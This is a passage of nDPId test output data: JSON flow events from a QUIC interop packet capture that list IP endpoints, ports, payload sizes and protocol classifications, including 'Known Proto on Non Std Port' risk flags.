+00826{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":69,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434776,"flow_last_seen":1603816434776,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":43735,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434512,"flow_last_seen":1603816434512,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":47010,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00664{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434886,"flow_last_seen":1603816435111,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1222,"flow_avg_l4_payload_len":305,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"133.242.206.244","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00694{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434606,"flow_last_seen":1603816444569,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"193.190.10.98","src_port":49658,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434519,"flow_last_seen":1603816434551,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":60346,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434582,"flow_last_seen":1603816434582,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"51.158.105.98","src_port":51887,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434743,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":42468,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00836{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":57,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434721,"flow_last_seen":1603816444586,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","src_port":50705,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434756,"flow_last_seen":1603816444721,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":10016,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00823{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434670,"flow_last_seen":1603816435086,"flow_idle_time":200000,"flow_min_l4_payload_len":19,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2542,"flow_avg_l4_payload_len":635,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":44619,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434606,"flow_last_seen":1603816434606,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"131.159.24.198","src_port":41587,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00854{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434677,"flow_last_seen":1603816434677,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:4:34::1","src_port":44243,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":77,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816435054,"flow_last_seen":1603816435054,"flow_idle_time":140000,"flow_min_l4_payload_len":79,"flow_max_l4_payload_len":79,"flow_tot_l4_payload_len":79,"flow_avg_l4_payload_len":79,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"138.91.188.147","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816435020,"flow_last_seen":1603816435194,"flow_idle_time":140000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":55,"flow_tot_l4_payload_len":165,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00861{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434685,"flow_last_seen":1603816434779,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1279,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":53760,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434784,"flow_last_seen":1603816434822,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a05:d018:ce9:8100:cd2a:e2fd:b3be:c5ab","src_port":44605,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00838{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434699,"flow_last_seen":1603816434699,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"18.189.84.245","src_port":54570,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"}} +00831{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434661,"flow_last_seen":1603816434997,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2558,"flow_avg_l4_payload_len":639,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"40.112.191.60","src_port":53791,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.Azure","breed":"Acceptable","category":"Cloud"}} +00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434602,"flow_last_seen":1603816434650,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":60983,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00828{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434585,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"133.242.206.244","src_port":49151,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00718{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434642,"flow_last_seen":1603816434642,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":1240,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00741{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":4,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434509,"flow_last_seen":1603816434509,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":34442,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00737{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":6,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434518,"flow_last_seen":1603816434566,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1267,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2a00:ac00:4000:400:2e0:4cff:fe68:199d","src_port":48707,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00859{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434535,"flow_last_seen":1603816444528,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2606:4700:10::6816:826","src_port":32957,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00873{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":24,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434599,"flow_last_seen":1603816434725,"flow_idle_time":200000,"flow_min_l4_payload_len":51,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1283,"flow_avg_l4_payload_len":641,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":52080,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00872{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434764,"flow_last_seen":1603816434897,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1259,"flow_avg_l4_payload_len":629,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00731{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":59,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434729,"flow_last_seen":1603816434729,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2604:a880:800:a1::1279:3001","src_port":56073,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00662{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434818,"flow_last_seen":1603816434818,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":556,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"18.189.84.245","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434772,"flow_last_seen":1603816434831,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:4:34::1","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00714{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":51,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434680,"flow_last_seen":1603816434845,"flow_idle_time":140000,"flow_min_l4_payload_len":1240,"flow_max_l4_payload_len":1240,"flow_tot_l4_payload_len":2480,"flow_avg_l4_payload_len":1240,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","dst_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","l4_proto":"icmp6","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMPV6","breed":"Acceptable","category":"Network"}} +00743{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":8,"flow_first_seen":1603816434670,"flow_last_seen":1603816444524,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":9856,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2600:1f18:2310:d230:5103:7d9e:7d75:374f","src_port":46242,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00871{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1603816434750,"flow_last_seen":1603816434750,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:19f0:5:c21:5400:1ff:fe33:3b96","src_port":38689,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00827{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434528,"flow_last_seen":1603816434679,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":2504,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"202.238.220.92","src_port":38366,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00864{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1603816434595,"flow_last_seen":1603816435011,"flow_idle_time":200000,"flow_min_l4_payload_len":35,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":2534,"flow_avg_l4_payload_len":633,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2400:8902::f03c:91ff:fe69:a454","src_port":56213,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"}} +00663{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1603816434609,"flow_last_seen":1603816434806,"flow_idle_time":140000,"flow_min_l4_payload_len":556,"flow_max_l4_payload_len":556,"flow_tot_l4_payload_len":1668,"flow_avg_l4_payload_len":556,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip4","src_ip":"51.158.105.98","dst_ip":"192.168.1.128","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"}} +00855{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":246,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1603816434569,"flow_last_seen":1603816434601,"flow_idle_time":200000,"flow_min_l4_payload_len":23,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1255,"flow_avg_l4_payload_len":627,"midstream":0,"thread_ts_msec":1603816444721,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:bc8:47a4:1c25::1","src_port":51185,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std 